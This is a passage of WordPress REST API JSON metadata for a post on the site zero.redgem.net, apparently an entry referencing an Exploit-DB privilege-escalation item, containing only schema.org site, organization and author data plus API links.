Privilege_EDB-ID:52580"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/57398","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=57398"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/57398\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=57398"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=57398"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=57398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}